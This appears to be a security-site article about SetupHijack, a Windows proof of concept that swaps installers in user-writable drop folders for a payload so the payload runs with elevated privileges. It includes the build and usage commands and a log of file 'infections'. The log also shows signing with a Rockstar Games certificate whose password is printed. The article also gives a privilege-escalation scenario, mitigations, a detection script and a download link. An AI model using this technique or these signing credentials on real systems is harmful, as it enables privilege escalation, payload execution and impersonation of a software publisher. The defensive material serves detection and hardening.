SetupHijack is a Windows security research and red team proof-of-concept that exploits insecure installer and updater file handling. The tool monitors common drop locations such as %TEMP%, %APPDATA% and %USERPROFILE%\Downloads and attempts to replace installer files with a supplied payload before a higher-privileged process executes them. It is written for authorised testing and defensive validation in controlled environments.

Features
- Scans common installer drop locations and substitutes detected installer files with a provided payload, optionally preserving the original as a .bak file.
- Operates from a low-privilege account and does not require elevated permissions to run.
- Flags to disable scanning of specific locations and a clean mode to restore backups.
- Includes a code-signing helper demonstration intended to improve substitution success rates against simple Authenticode checks.
- Build scripts and example outputs are included for lab reproduction.
Installation
The repository uses a Microsoft build toolchain and includes build scripts and a Makefile. Follow the README for full prerequisites and environment notes. The README documents the build step as follows (verbatim):
```bat
nmake PAYLOAD=c:\Users\YourUser\Desktop\payload.exe
```
Ensure you have a supported Visual C++ build environment, such as Visual Studio Build Tools or the Platform Build Tools available on PATH. The README includes helper batch files and additional environment notes; consult the repository for complete prerequisites and optional code signing helper utilities.
Usage
The README provides documentation of the runtime options:
```bat
SetupHijack.exe                 # Scan %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads (default)
SetupHijack.exe -notemp         # Disable scanning %TEMP%
SetupHijack.exe -noappdata      # Disable scanning %APPDATA%
SetupHijack.exe -nodownloads    # Disable scanning %USERPROFILE%\Downloads
SetupHijack.exe clean           # Clean mode (restores .bak backups in all enabled locations)
SetupHijack.exe verbose         # Verbose mode (log all actions)
SetupHijack.exe <payload.exe>   # Use specified payload for .exe (unless argument is a recognized option)
```
- Run `SetupHijack.exe` before or during a privileged install or update process to attempt substitution.
- The tool scans %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads by default; use flags to disable specific locations.
- The `clean` flag restores backups created by the tool; `verbose` increases logging.
Example output
The repository includes example build and run logs showing compilation, payload substitution, and execution. An excerpt reproduced from the README validates the build and run flow:
```text
C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe"

Microsoft (R) Program Maintenance Utility Version 14.29.30159.0
Copyright (C) Microsoft Corporation.  All rights reserved.

        powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp"
        cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp
SetupHijack.cpp
SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced
        taskkill /f /im SetupHijack.exe 2>nul
        powershell -Command "Start-Sleep -Milliseconds 500"
        link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest
        copy /y install.wxs.template install.wxs
        1 file(s) copied.
        powershell -Command "(Get-Content install.wxs) -replace 'Source=\"PAYLOAD_PLACEHOLDER\"', 'Source=\"%ESCAPED_PAYLOAD%\"' | Set-Content install.wxs"
        wix build install.wxs -o install.msi
Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe
Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe
        powershell -Command "(Get-Content install.wxs) -replace '(<File Id=\"RengeExeFile\" Source=\").*?(\" KeyPath=\"yes\"/>)', '`%ESCAPED_PAYLOAD%`' | Set-Content install.wxs"
        call sign_random.bat
Using CERT: [certs\rockstar1.pfx]
Using PASS: [C!EZxYUxVGPzQDj3]
The following certificate was selected:
    Issued to: Rockstar Games, Inc.
    Issued by: Entrust Code Signing CA - OVCS1
    Expires:   Thu Mar 20 17:16:13 3000
    SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store
Successfully signed: SetupHijack.exe

Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0
The following certificate was selected:
    Issued to: Rockstar Games, Inc.
    Issued by: Entrust Code Signing CA - OVCS1
    Expires:   Thu Mar 20 17:16:13 3000
    SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store
Successfully signed: install.msi

Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0

C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe
[2025-09-24 15:20:46] [SetupHijack] Using payload: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 15:20:46] [SetupHijack] If infecting .msi, will use: install.msi
[2025-09-24 15:20:46] [SetupHijack] Polling enabled locations recursively for .exe, .msi, .bat:
[2025-09-24 15:20:46]   - C:\Users\FANTAS~1\AppData\Local\Temp
[2025-09-24 15:20:46]   - C:\Users\Fantastic\AppData\Roaming
[2025-09-24 15:20:46]   - C:\Users\Fantastic\Downloads
[2025-09-24 15:20:46] [SetupHijack] Entering infection loop.
[2025-09-24 15:20:59] [SetupHijack] Total infections this session: 0
[2025-09-24 15:21:13] [SetupHijack] Replaced C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat with payload install.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak
[2025-09-24 15:21:13] [SetupHijack] New infections this run: 1
[2025-09-24 15:21:22] [SetupHijack] Replaced C:\Users\Fantastic\Downloads\installcmd.msi with payload install.msi, backup: C:\Users\Fantastic\Downloads\installcmd.msi.bak
[2025-09-24 15:21:26] [SetupHijack] New infections this run: 1
[2025-09-24 15:21:26] [SetupHijack] Total infections this session: 2
[2025-09-24 15:21:41] [SetupHijack] Replaced C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak
[2025-09-24 15:21:41] [SetupHijack] New infections this run: 1
[2025-09-24 15:21:53] [SetupHijack] Total infections this session: 3
```
Refer to the repository for the full example outputs and additional build traces.
Offensive scenario
After obtaining a low-privilege foothold on a Windows host, an operator compiles SetupHijack with a follow-on payload and runs the binary in the background. When an administrator later runs an updater that writes a temporary installer into %TEMP% and executes it without a robust integrity check, the substituted payload executes with the elevated context of the installer. The operator can then use the elevated process to extract credentials, enable persistence, or move laterally. The repository’s README demonstrates a lab flow that includes build, start, and trigger steps, suitable for reproduction.
Detection and mitigation
SetupHijack abuses insecure installer handling and race conditions. Practical mitigations include:
- Require and validate Authenticode signing before executing installers. Enforce signature checks at execution time.
- Avoid executing binaries from world-writable locations such as %TEMP%. Use secure per-installer directories or Windows Installer service patterns that avoid unsafe temporary drops.
- Monitor for unexpected rapid replace or rename events in installer drop locations during installer execution windows and correlate file system events with process launches.
- Implement file integrity monitoring for installer artifacts and alert on unauthorized modifications.
- Restrict which installers may be executed through endpoint control policies and require attestation for installer binaries where feasible.
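The correlation described in the monitoring items above, as an added example written for this article rather than code from the SetupHijack repository. It assumes a simplified, hypothetical Sysmon-like event format (timestamp, FileCreate or ProcessCreate, the installer path, the writing or launching image, and an integrity level) and uses constructed sample telemetry that mirrors the installcmd.bat substitution seen in the run log: an installer in a drop location is overwritten by a process other than its original author shortly before an elevated launch, and a sibling .bak copy appears.

```python
import re
from datetime import datetime, timedelta

# Installer drop locations and artifact types named on the page (matched case-insensitively).
DROP_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\downloads\\")
INSTALLER_EXT = (".exe", ".msi", ".bat")
EVENT_RE = re.compile(r"^(\S+) (FileCreate|ProcessCreate) path=(.+?) image=(.+?)(?: integrity=(\S+))?$")

# Constructed sample telemetry in a hypothetical Sysmon-like shape (not real Sysmon output): a legitimate
# updater drops installcmd.bat, another process backs it up and overwrites it, an elevated cmd.exe runs it
# two seconds later. The Downloads entries are a benign control case (one writer, launched much later).
SAMPLE_EVENTS = r"""
2025-09-24T15:21:10 FileCreate path=C:\Users\Bob\AppData\Local\Temp\installcmd.bat image=C:\Program Files\Updater\updater.exe
2025-09-24T15:21:13 FileCreate path=C:\Users\Bob\AppData\Local\Temp\installcmd.bat.bak image=C:\Users\Bob\tools\SetupHijack.exe
2025-09-24T15:21:13 FileCreate path=C:\Users\Bob\AppData\Local\Temp\installcmd.bat image=C:\Users\Bob\tools\SetupHijack.exe
2025-09-24T15:21:15 ProcessCreate path=C:\Users\Bob\AppData\Local\Temp\installcmd.bat image=C:\Windows\System32\cmd.exe integrity=High
2025-09-24T15:30:00 FileCreate path=C:\Users\Bob\Downloads\vlc-setup.exe image=C:\Program Files\Mozilla Firefox\firefox.exe
2025-09-24T15:45:00 ProcessCreate path=C:\Users\Bob\Downloads\vlc-setup.exe image=C:\Users\Bob\Downloads\vlc-setup.exe integrity=High
"""

def in_drop_dir(path):
    low = path.lower()
    return low.endswith(INSTALLER_EXT) and any(d in low for d in DROP_DIRS)

def parse(text):
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if m:
            ts, kind, path, image, integrity = m.groups()
            yield datetime.fromisoformat(ts), kind, path, image, integrity

def analyse(text, window=60):
    # Alerts: an installer rewritten by a second process within `window` seconds before an elevated
    # launch, or a sibling .bak copy of an installer appearing in a drop location.
    writes, alerts = {}, []
    for ts, kind, path, image, integrity in parse(text):
        low = path.lower()
        if kind == "FileCreate":
            if low.endswith(".bak") and in_drop_dir(path[:-4]):
                alerts.append(f"backup of installer created by {image}: {path}")
            elif in_drop_dir(path):
                writes.setdefault(low, []).append((ts, image))
        elif kind == "ProcessCreate" and integrity in ("High", "System") and in_drop_dir(path):
            hist = writes.get(low, [])
            # Writes by any process other than the original author, inside the window before launch.
            suspect = [(t, w) for t, w in hist if w != hist[0][1] and ts - t <= timedelta(seconds=window)]
            if suspect:
                last_t, last_w = suspect[-1]
                gap = int((ts - last_t).total_seconds())
                alerts.append(f"installer {path} rewritten by {last_w} {gap}s before elevated launch by {image}")
    return alerts
```

On real telemetry the same two rules map onto Sysmon Event ID 11 (FileCreate) and Event ID 1 (ProcessCreate) with the IntegrityLevel field; the writer-mismatch rule is the one that survives if the tool is run without backups.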
Related tools and articles
For defensive context and related techniques, consider these Darknet articles:
- UACMe – Defeat Windows User Account Control — background on User Account Control bypass techniques and why installers can be an escalation vector.
- Windows_EndPoint_Audit – Endpoint Security Auditing Toolkit — automated checks for services, registry, and file permissions that help defenders validate controls against installer abuse.
- BDFProxy – Patch Binaries via MiTM — shows binary patching via man-in-the-middle approaches and highlights related risks when installers are fetched over the network without integrity checks.
- mitmproxy – Intercepting HTTP Proxy Tool — useful for defenders to emulate and inspect installer download flows in test environments.
Conclusion
SetupHijack is a compact, well-documented proof of concept for exploiting insecure installer and updater file handling on Windows. It is helpful in red teams for testing local escalation and persistence controls and useful to defenders for validating detection and hardening strategies. Use it only with explicit permission and in isolated environments.
You can read more or download SetupHijack here: https://github.com/hackerhouse-opensource/SetupHijack